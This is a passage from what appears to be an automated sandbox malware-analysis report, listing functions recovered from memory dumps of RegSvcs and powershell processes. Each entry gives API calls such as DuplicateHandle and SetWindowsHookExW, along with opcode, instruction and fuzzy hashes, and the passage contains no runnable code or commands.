                                                              • Opcode Fuzzy Hash: bc4ef66134a1bfd7806cfd55b1017e061355c4a1c2ce25fa2d0c6ba5843bd82f
                                                              • Instruction Fuzzy Hash: EB21E5B5D002499FDB10CF9AD985ADEBBF9FB48320F14841AE914A3210D378A940CFA5
                                                              Function 06277DDC Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0627841E,?,?,?,?,?), ref: 062784DF
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 631cf70098f90751a54b613e48eecb5da450ccb15a08c04d3c2683b4973b5ec4
                                                              • Instruction ID: 5b273fece737a91f06631567b8f3f3cae62f6f983c3511376d214b882ed69618
                                                              • Opcode Fuzzy Hash: 631cf70098f90751a54b613e48eecb5da450ccb15a08c04d3c2683b4973b5ec4
                                                              • Instruction Fuzzy Hash: BC21E6B59002599FDB10CF9AD984ADEFBF8FB48310F14841AE914A3310D379A944DFA4
                                                              Function 062730C8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0627314B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: 208c8258caa9b9806a5162cd09206ca35d8be4bcdf86464c42855224cd37f671
                                                              • Instruction ID: 6edef59e321665905cd7a23fb93f1846568f55c31007454f87671b18a97a406a
                                                              • Opcode Fuzzy Hash: 208c8258caa9b9806a5162cd09206ca35d8be4bcdf86464c42855224cd37f671
                                                              • Instruction Fuzzy Hash: 332104B1D002099FCB54DF9AC944BEFBBF5EF88310F10842AE419A7250CB79A944CFA1
                                                              Function 062730D0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0627314B
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4487520638.0000000006270000.00000040.00000800.00020000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_6270000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID: HookWindows
                                                              • String ID:
                                                              • API String ID: 2559412058-0
                                                              • Opcode ID: f5b9e7e406b5cb9c1bc6972c6016f0b91bc3dcb9c5c9329118d2ee39e7457e6c
                                                              • Instruction ID: a37a23b7494bf8d23b6b7a3e324c15ab68127969fda5a3c7f3903f5cacb4600f
                                                              • Opcode Fuzzy Hash: f5b9e7e406b5cb9c1bc6972c6016f0b91bc3dcb9c5c9329118d2ee39e7457e6c
                                                              • Instruction Fuzzy Hash: 1621E4B1D002099FCB54DF9AD944BEEBBF5EB88310F10842AD419A7250C779A944CFA1
                                                              Function 0295D2B4 Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470274873.000000000295D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0295D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_295d000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e21288b711c3d4c57c5fecd3ee1509f15811ae88907580a2751b479a16b50d6a
                                                              • Instruction ID: 3958b9f46d10e2fd10256f0fedb2a62b2bbcc9cde35d00a83c2d7dfd045aad9a
                                                              • Opcode Fuzzy Hash: e21288b711c3d4c57c5fecd3ee1509f15811ae88907580a2751b479a16b50d6a
                                                              • Instruction Fuzzy Hash: BE21C275604204AFDB05DF24D5C4B26BB69FB88318F24C969ED494B256C33AD846CBB1
                                                              Function 0295D0EC Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470274873.000000000295D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0295D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_295d000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 93d1bad1a2dd340cdc9a187b8c278d5ce5cfd92d0037a6fccde482d71d922401
                                                              • Instruction ID: a831022030cc29b03c31ecb9d344ccbd3813c10c90b09426690453b063f4adc2
                                                              • Opcode Fuzzy Hash: 93d1bad1a2dd340cdc9a187b8c278d5ce5cfd92d0037a6fccde482d71d922401
                                                              • Instruction Fuzzy Hash: 7A21F271644204EFDB08DF14D9C0B26BB69FB88314F20C969DC0A4B396C33AD406CBB1
                                                              Function 0295D1D4 Relevance: .1, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470274873.000000000295D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0295D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_295d000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 71b2527bf9d755b65d26375c95c60bea87e51e7a921de60571be313242ee13e6
                                                              • Instruction ID: 2d34e77b72e8efd0121f7a46a7c0e0a9a990307e82ca4ca18adb45d77dbfb48d
                                                              • Opcode Fuzzy Hash: 71b2527bf9d755b65d26375c95c60bea87e51e7a921de60571be313242ee13e6
                                                              • Instruction Fuzzy Hash: A721B0716042009FDB14DF64D5C4F26BFA9EB88314F20C969ED0A4B256C33AD446C772
                                                              Function 0295D0E7 Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470274873.000000000295D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0295D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_295d000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: 1b1409cd5551dde2f2a0fb775a7d976ec4e484034efa044dacd87957c05d55d7
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: 46119D75604280DFDB06CF14D9C4B15BFB2FB88314F24C6A9DC494B656C33AD44ACBA2
                                                              Function 0295D2AF Relevance: .1, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470274873.000000000295D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0295D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_295d000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction ID: e804d8a6f3eef8f7701563177afc8cf51f98dd002c03d9ee872e51d21b990335
                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                              • Instruction Fuzzy Hash: D2119D75604680DFDB06CF14D5C4B15BFA1FB84318F28C6A9DC494B656C33AD44ACBA2
                                                              Function 0295D1CF Relevance: .1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.4470274873.000000000295D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0295D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_295d000_RegSvcs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                                              • Instruction ID: f24c7ec5487c5773195c82826f7ca09a0fb9ddcb19f83fb88237db76288a6d30
                                                              • Opcode Fuzzy Hash: 212b96ca827b798fa91ccd41c0eac3b093082415815754ec50078a914fdf967d
                                                              • Instruction Fuzzy Hash: E9119A75604280CFDB16CF24D5C4B15BFA2FB88218F24C6ADDC494B666C33AD44ACB62

                                                              Executed Functions

                                                              Function 00D0B470 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: df
                                                              • API String ID: 0-3236848788
                                                              • Opcode ID: 6c70deeba7e10845a5e0110f884e6cc23d778400db21272e100f4f19cd96cae1
                                                              • Instruction ID: 7dea74abc37989472883d4bd8ce3f66caaad04c9b2f175b0d1af20ddb9bccb8a
                                                              • Opcode Fuzzy Hash: 6c70deeba7e10845a5e0110f884e6cc23d778400db21272e100f4f19cd96cae1
                                                              • Instruction Fuzzy Hash: 8C9192B1F007145BDB19EFB48511AAF7BE2EF84700B00892ED106AB798DF795E098BD5
                                                              Function 00D0B490 Relevance: 1.5, Strings: 1, Instructions: 252COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: df
                                                              • API String ID: 0-3236848788
                                                              • Opcode ID: a58c80ea6a5b027c29ad5d772f929bbde0520f6839f42d3035de4b905e731dd8
                                                              • Instruction ID: 51d799a2439b35c16f3ff69d3ea695c9a5c3b5d386213d8472dff4bc54b2d80a
                                                              • Opcode Fuzzy Hash: a58c80ea6a5b027c29ad5d772f929bbde0520f6839f42d3035de4b905e731dd8
                                                              • Instruction Fuzzy Hash: 3F9192B0F007145BDB19EFB48511AAFB7E2EF84700B00892ED106AB798DF795E098BD5
                                                              Function 06C02308 Relevance: 20.7, Strings: 16, Instructions: 653COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$pij$pij$pij$pij$pij$|,j$J&l$J&l$J&l$J&l$J&l$J&l$r%l$r%l
                                                              • API String ID: 0-1114343213
                                                              • Opcode ID: 4be0cf8cf6c0ba11cd07e636a747240590a6a6323bf56781686fa5829d83b8d4
                                                              • Instruction ID: f059141f78946da0f60a2adf0caa22993360a6bf6a5de52a3468260cfefe7bf4
                                                              • Opcode Fuzzy Hash: 4be0cf8cf6c0ba11cd07e636a747240590a6a6323bf56781686fa5829d83b8d4
                                                              • Instruction Fuzzy Hash: A8224831B00209DFEB619F69C85866ABBE6EF85310F1480BED945CB291DB39CF45C7A1
                                                              Function 06C03CE8 Relevance: 5.6, Strings: 4, Instructions: 576COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq
                                                              • API String ID: 0-4000621977
                                                              • Opcode ID: e1a67f7dfd6a6735f76f790f6b5aa504433bc49710d69e8413e17d62ab73966e
                                                              • Instruction ID: 4b51fc62a1b3bb53cbdf536935f759675cda38ab816a6633c4450ca401eed2dd
                                                              • Opcode Fuzzy Hash: e1a67f7dfd6a6735f76f790f6b5aa504433bc49710d69e8413e17d62ab73966e
                                                              • Instruction Fuzzy Hash: C6125332B04255CFEB598B68841076BBBE2AF91311F24C4AEDA05DB2D1DB31CE55C7A1
                                                              Function 00D0E610 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pij$J&l
                                                              • API String ID: 0-1760783336
                                                              • Opcode ID: 124d77438fb59c97497dbf545561024c0a6791583ea8c5a4457b36fb659e06d3
                                                              • Instruction ID: c4fb2aeb9105df102ea430b8ee7e21ce8912e6e0fc1f2d04f9b69f8d469e538c
                                                              • Opcode Fuzzy Hash: 124d77438fb59c97497dbf545561024c0a6791583ea8c5a4457b36fb659e06d3
                                                              • Instruction Fuzzy Hash: 0741BE71A002058FCB15DF79E954B9DBBF1EF49304F14866AD41AAB3A1DB34AD05CBE0
                                                              Function 00D0E640 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pij$J&l
                                                              • API String ID: 0-1760783336
                                                              • Opcode ID: 6574ffb8e8409f76e7e5b4caba380bd99ce15b5ad4bfc1dac98476e44357e7f6
                                                              • Instruction ID: a0da4963574f4a96edf35ba445753a0dbcddb9670fbe73131a6f5bfbccba0795
                                                              • Opcode Fuzzy Hash: 6574ffb8e8409f76e7e5b4caba380bd99ce15b5ad4bfc1dac98476e44357e7f6
                                                              • Instruction Fuzzy Hash: BA317E70A002059FCB14DF69D994B9DBBF2FF88300F148529D419A73A4DB34AD05CBE0
                                                              Function 00D06FE0 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nq
                                                              • API String ID: 0-2756854522
                                                              • Opcode ID: 688f4ba2adf4d94a8f02d2c6f557c4fd8f14d1b44892c7a3ab8f560cf2351282
                                                              • Instruction ID: b457942aeae7969262f93d080d7a51dbfadad52597831c70b7fb03126028adbe
                                                              • Opcode Fuzzy Hash: 688f4ba2adf4d94a8f02d2c6f557c4fd8f14d1b44892c7a3ab8f560cf2351282
                                                              • Instruction Fuzzy Hash: BE413C34B042448FDB14DF68C558AAEBBF2AF8D310F194099D406EB3A5DB35ED01CB61
                                                              Function 00D0AF98 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&jq
                                                              • API String ID: 0-3222446104
                                                              • Opcode ID: e98bf6fc6ba2f2735d89551b41093764511b397031d4e73cb4ccdffbfe501923
                                                              • Instruction ID: 1554c5ea3968f93513fecef2e114a82878646977c3f7fa357bd875cd80f4907b
                                                              • Opcode Fuzzy Hash: e98bf6fc6ba2f2735d89551b41093764511b397031d4e73cb4ccdffbfe501923
                                                              • Instruction Fuzzy Hash: 6B219171A042598FCB14DFAED40479FBFF5EF89320F24846AD518A7380CB759905CBA5
                                                              Function 00D029F0 Relevance: .2, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b2fa323ff3220aea7fe4a7c1e70126057857ad06250de5f70cb27115f123fe3f
                                                              • Instruction ID: 218f4f1d380f935f32ef506d2fe3df39544ccf7ae67a2cb4bab883a71df05bee
                                                              • Opcode Fuzzy Hash: b2fa323ff3220aea7fe4a7c1e70126057857ad06250de5f70cb27115f123fe3f
                                                              • Instruction Fuzzy Hash: DC915A70A01605CFCB15CF59C598ABEFBB1FF89310B288559D819AB3A5C735EC91CBA0
                                                              Function 00D0BAB0 Relevance: .2, Instructions: 159COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b5107556996bdbd01f32ad5a4ab7d4899c6eb2e0f86b4238e05c8609f71a469c
                                                              • Instruction ID: 87f3be467e393c9c860cdd439ec17ce1696a6620dcdd311b658c1e38940df117
                                                              • Opcode Fuzzy Hash: b5107556996bdbd01f32ad5a4ab7d4899c6eb2e0f86b4238e05c8609f71a469c
                                                              • Instruction Fuzzy Hash: E5613970E042499FDB14DFA9D584B9DBFF5EF49310F18816AE809AB3A4DB349C45CBA0
                                                              Function 00D07740 Relevance: .2, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: aa29828c8d6f18b294d0b022b449cd6f67f3eaec872e00b736b6239eaa885afa
                                                              • Instruction ID: 1a9a2fed58b41612a6d3389db5325e31d08a242f55841949de6ba74a6f8c5f1a
                                                              • Opcode Fuzzy Hash: aa29828c8d6f18b294d0b022b449cd6f67f3eaec872e00b736b6239eaa885afa
                                                              • Instruction Fuzzy Hash: 3151A1357082059FD7049B69D844B6A7BEAFF89354F2985AAE409CB391DB35EC01CBA0
                                                              Function 00D0BAC0 Relevance: .2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f88c7d4d92c7516cc025daa8feb1722e639dcc99f6e263bf95e1cec8a95e2b71
                                                              • Instruction ID: 9629e8ee4cfbe1b111b1b153292442e8d319fe0fb25d0a5e79cd277f1973ec5f
                                                              • Opcode Fuzzy Hash: f88c7d4d92c7516cc025daa8feb1722e639dcc99f6e263bf95e1cec8a95e2b71
                                                              • Instruction Fuzzy Hash: F9612A71D002489FDB14DFA9D584B9DFBF5EF88310F18812AE809AB394DB349D45CBA0
                                                              Function 00D0E419 Relevance: .1, Instructions: 149COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4fd8d55009930bc1ab86144a2005b44a5adbf045cb908779d3983673cda2bcd6
                                                              • Instruction ID: 8f6335e9e6f6da4414f9b8ede71a9ae4506d6d7ece22bbcff48fe5bfc88acfa6
                                                              • Opcode Fuzzy Hash: 4fd8d55009930bc1ab86144a2005b44a5adbf045cb908779d3983673cda2bcd6
                                                              • Instruction Fuzzy Hash: F55144B4B002058FCB14DF6CD594E6ABBE6EF99314B148869E549CF3A5EB34DC01CB91
                                                              Function 00D0E428 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e711d7617ebf925b4f6ac9cf69afcb1e16600d933b3fa5f28b1e564e99329b65
                                                              • Instruction ID: 4dfd01a08b8951a1a02bd6862b0626332283483238677de7bcadd94d87286b70
                                                              • Opcode Fuzzy Hash: e711d7617ebf925b4f6ac9cf69afcb1e16600d933b3fa5f28b1e564e99329b65
                                                              • Instruction Fuzzy Hash: 2B4133B4B002058FCB14DF6CD994E6ABBE6EF98314B148869E509CF3A5EB34DC01CB91
                                                              Function 06C03CCC Relevance: .1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2074883631.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6c00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cc21a71006614388bb0eb3b3207b22ace18ef1bbc2174db079c2dbd7d1a0cd24
                                                              • Instruction ID: bb9695684d20ddde34f49cc12bb3af2940e6f61617216fb07d13c4a89da45802
                                                              • Opcode Fuzzy Hash: cc21a71006614388bb0eb3b3207b22ace18ef1bbc2174db079c2dbd7d1a0cd24
                                                              • Instruction Fuzzy Hash: 37414731F10282CFEBA08F288541677BBA29F81600F1485AED8189F2D5C731DE55CBE1
                                                              Function 00D02B00 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 966a3e1d3e5db8ef95561409346b0d11fb0407d9b1231980178a91e776f9a52f
                                                              • Instruction ID: f039999f4ef48f521132f3c6782f196c366826368f002880e522b2f4935490bb
                                                              • Opcode Fuzzy Hash: 966a3e1d3e5db8ef95561409346b0d11fb0407d9b1231980178a91e776f9a52f
                                                              • Instruction Fuzzy Hash: 2C412774A01505DFCB05CF58C598ABEFBB1FF48310B258199D859AB3A4C732EC91CBA4
                                                              Function 00D0DFC0 Relevance: .1, Instructions: 102COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fa23166c1a4bbed5966021e320f7dcd01c05a96f1d5aa881e7500f68d04a25c0
                                                              • Instruction ID: 91862e2903c6c43b16821046e250be94e2a30b18a313a25ee54c5e6267098ff2
                                                              • Opcode Fuzzy Hash: fa23166c1a4bbed5966021e320f7dcd01c05a96f1d5aa881e7500f68d04a25c0
                                                              • Instruction Fuzzy Hash: 0E317E71A002058FCB149F69D4587ADBBF6FF88320F14856AE406E7390DF759C41CBA0
                                                              Function 00D0C388 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d824862beaab3563cc655cc6fa1cfe336a6fff4dd7cc2c873072a1dd64271b2e
                                                              • Instruction ID: cc05500145adeaa62c92495c87c461c5a318898ebfab8d737e5b17b9a1f831fe
                                                              • Opcode Fuzzy Hash: d824862beaab3563cc655cc6fa1cfe336a6fff4dd7cc2c873072a1dd64271b2e
                                                              • Instruction Fuzzy Hash: 23313C313006019FC709EB78E855B9AB79AEFC4311F048639E509CB3A5DB79A919CBE1
                                                              Function 00D06FD1 Relevance: .1, Instructions: 100COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74d29b34b7a8c1cfdafb48fd8c008d4933dcca6cfa7aefeedc89589b65a605ce
                                                              • Instruction ID: 784a3dfb0fdfd6e4c2e30b4434e0b069477667dfa025abedec11e6151648bdce
                                                              • Opcode Fuzzy Hash: 74d29b34b7a8c1cfdafb48fd8c008d4933dcca6cfa7aefeedc89589b65a605ce
                                                              • Instruction Fuzzy Hash: 39313C34B042058FCB14DF65C958AAEBBF1AF8D314F184169E406EB3A1DB31EC01CB60
                                                              Function 00D0AE60 Relevance: .1, Instructions: 90COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d32a5660cd9d07487b6bad368ddb8d8ecdb79f42c48eb3912bb1439c831aa410
                                                              • Instruction ID: f6d93cb28c9852cbd528d14f168ee00c44513f15ef599e1faa0e4e71869bd005
                                                              • Opcode Fuzzy Hash: d32a5660cd9d07487b6bad368ddb8d8ecdb79f42c48eb3912bb1439c831aa410
                                                              • Instruction Fuzzy Hash: FB310C70B0060A9FDB08DBADD5957AEBFF6EF89310F158029E505E7394EB748C418BA1
                                                              Function 00D0AD28 Relevance: .1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 571e844bbf091a0479b95127bfd18eb3f4cccef640fab6fc460f190947e2768b
                                                              • Instruction ID: 64edb8a9315612b392814a369b410fad80573d658172262e0963beb8033b28df
                                                              • Opcode Fuzzy Hash: 571e844bbf091a0479b95127bfd18eb3f4cccef640fab6fc460f190947e2768b
                                                              • Instruction Fuzzy Hash: 1A319070A002459FDB04DFA4D855BAFBBF6EF85300F1184B9E211AB395DE389E40CBA1
                                                              Function 00D0AE70 Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2067913143.0000000000D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D00000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_d00000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 48b648b73089a1ad31c72c0ce6be0c7ec17d1e7ea2a4128a8a80aaac20fb9235
                                                              • Instruction ID: 40642ee63c5f900dd04a143b7bcc8f0c646fc05011917d9c3bfe171fa8cd13a1
